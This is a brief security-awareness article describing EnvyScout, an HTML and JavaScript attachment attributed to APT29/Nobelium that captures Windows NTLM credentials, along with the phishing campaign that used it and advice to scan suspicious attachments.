Remove EnvyScout Malware
The APT29 hackers, also tracked under the group name Nobelium, have recently unleashed a new attack campaign, which uses a whole new array of malware samples. The previously undetected malware families are likely to have been developed by the Nobelium criminals, and they are being used in carefully planned attacks, which involve multiple stages of execution.
So far, the recent campaign has targeted several organizations around the world, the most notable of which is the U.S. Agency for International Development (USAID.) Allegedly, the hackers managed to compromise one of the organization's email accounts and then abuse it to send out spam emails delivering the various payloads. The targeted organizations cover a wide range of sectors such as development, humanitarian, political, and various non-profit organizations.
One of the first payloads to be involved in these attacks is called EnvyScout. It is a very simple malicious file, which uses a combination of HTML and JavaScript to try and load a special image from an external server. The way the loading is done, however, enables the attackers to obtain the user's Windows NTLM (NT Lan Manager) credentials in an encoded state. They can then try to recover the plain-text password and use it to compromise the victim's machine in order to deploy additional payloads.
The EnvyScout Malware is the very first stage of the chain of attacks that the Nobelium hackers perform in their recent operation. Users should be wary of suspicious emails asking them to download and view an attachment – you should always scan such files with the help of a suitable security tool.